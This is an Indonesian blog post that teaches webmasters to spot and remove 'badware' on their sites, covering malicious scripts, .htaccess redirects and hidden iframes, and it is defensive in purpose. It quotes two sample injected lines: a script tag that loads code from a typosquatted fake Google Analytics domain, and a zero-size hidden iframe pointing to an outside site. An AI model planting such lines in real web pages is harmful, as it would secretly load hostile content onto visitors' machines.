Mengenal badware dan ketahui cara mengatasinya

12/02/2011
Jika anda memiliki blog ataupun situs,bisa jadi tanpa sengaja atau tidak diketahui oleh anda telah tersusupi oleh badware atau badware behavior.Hal ini bisa terjadi karena dilakukan oleh orang lain yang sengaja secara langsung menyerang situs anda,atau memang sengaja di tanam pada progrm aplikasi web anda atau melalui template,plugin yang bukan buatan anda sendiri.


Berikut ini adalah 3 bentuk badware yang biasa ditemukan.


1. Malicious Scripts
Intinya malicious scripts adalah script yang ketika diload akan me-redirect pengunjung anda ke website lain yang meload badware. Malicious scripts biasanya menggunakan enkripsi. Hal inilah yang mengakibatkan scanner antivirus sulit mendeteksi keberadaan malicious script. Misalnya:

Mengenal badware dan ketahui cara mengatasinya


Ada juga malicious scripts yang menyamarkan diri dengan mencantumkan nama situs-situs resmi. Sehingga seolah-olah mereka adalah link penting yang tidak boleh dihapus. Padahal jika anda jeli dan  berhati-hati, anda akan menemukan ada miss spelling pada link tersebut. Misalkan pada contoh berikut. Perhatikan kesalahan spell dari “analytics”. Kesalahan ini bukannya disengaja, melainkan situs tersebut memang merupakan situs yang menghost badware. Diatasnamakan seolah-olah berasal dari Google.

<script src="http://google-anaystic.com/uncn.js"></script>


Bagaimana malicious scripts bisa masuk? Penyerang biasanya menyuntikkan sebaris script pada konten halaman web korban. Atau ke dalam file lain di webserver korban, seperti gambar atau file PDF. Penyuntikkan dilakukan melalui bug atau celah sekuriti website korban karena kelalaian dalam melakukan update, setting file permission, dan sebagainya. Atau bisa juga karena informasi login yang telah bocor. Kadang-kadang, di samping menyuntik seluruh script ke halaman web korban, penyerang hanya menginject sebuah pointer ke suatu file .js atau file lain yang penyerang suntikkan juga di suatu direktori web server anda. Untuk mengidentifikasi Malicious Scripts memang diperlukan bagi webmaster agar memiliki pemahaman mengenai scripting yang bagus dan mengenal semua bagian script website yang dibuat, agar bisa membedakan apakah kode bagian ini badware atau bukan.

2. [.htaccess] Redirects
Web server Apache yang digunakan oleh banyak provider hosting menggunakan file server tersembunyi bernama .htaccess untuk mengkonfigurasi setting akses tertentu untuk direktori-direktori pada website. File inilah yang dijadikan penyerang untuk memasang badware. Penyerang sewaktu-waktu memodify sebuah .htaccess file yang sudah ada di server atau mengupload file .htaccess baru ke web server yang mengandung instruksi untuk mengarahkan user ke website lain, seringkali satu yang mengarahkan pengunjung ke download badware atau penjualan produk penipuan.
Mengenal badware dan ketahui cara mengatasinya

3. Hidden Iframes
Sebuah iframe adalah satu bagian dari halaman web yang meload konten dari halaman atau situs lain. Penyerang hanya akan menyuntikkan malicious iframes ke dalam sebuah halaman web atau file lain ke server anda. Seringkali, iframes ini akan dikonfigurasi sehingga badware tidak perlu menampilkan diri di halaman web ketika pengunjung mengakses halaman tersebut, tetapi konten malicious yang mereka ekekusi akan tetap dijalankan, hanya saja tersembunyi dari penglihatan pengunjung.

 <iframe src="http://youneedsex.com/on.php" width=0 height=0 frameborder=0></iframe>



Bagaimana Mencarinya?
Jika situs anda diblok karena dianggap sebagai situs badware oleh Google, anda dapat menggunakan Google’s Webmaster Tools untuk mendapat informasi lebih lanjut tentang bagian mana yang terdeteksi. Sedikit informasi bisa juga ditemukan pada halaman Google Diagnostics, yang dapat ditemukan melalui situs berikut. Ganti example.com dengan nama domain anda:

www.google.com/safebrowsing/diagnostic?site=example.com


Jika menggunakan cara diagnostik ini bisa juga untuk anda yang ingin mengetahui apakah website tujuan anda terinfeksi atau tidak sehingga anda tidak terlanjur mengunduh badware tanpa sengaja dari situs tujuan anda jika telah terinfeksi

Ada banyak layanan scan website baik gratis maupun berbayar di Internet yang dapat membantu anda menghilangkan badware dari situs anda. Try google it.

Menghilangkan Badware Behaviour
Sekali anda menemukan kode yang menyebabkan tingkah badware, anda bisa saja cukup menghapus kode yang mengacau. Tetapi akan lebih mudah jika anda memiliki backup bersih dari konten situs anda, kemudian mengupload ulang semua file backup anda, tetapi berhati-hatilah untuk tidak mengoverwrite file-file yang mungkin berubah sejak backup terakhir anda.
Karena beberapa kasus, konten badware bisa jadi disimpan juga di dalam database anda. Di kasus inilah anda harus merestore backup database anda. Atau jika anda memiliki pemahaman mengenai database, anda bisa mengedit record yang tercemar.

Sumber: http://www.jagoanhosting.com/blog/

Artikel Terkait Mengenal badware dan ketahui cara mengatasinya

Previous
Next Post »

1 komentar:

Write komentar
Lukisan Murah
AUTHOR
11 Mei 2012 pukul 15.40 delete

Huuuufft,, mengerikan ya Gan,,, Ane dah kena',,
but,,, yang jahiL, pasti akan berakhir dengan sendirinya,
sapa lg kalau bukan kompetitor :D

Reply
avatar

Anda pasti benci SPAM, saya juga sama.Komentar dimoderasi, SPAM akan difilter manual. NO KEYWORD ANCHOR pada NAME! .BACA Terms Of services.
Terimakasih atas komentar dan kritiknya..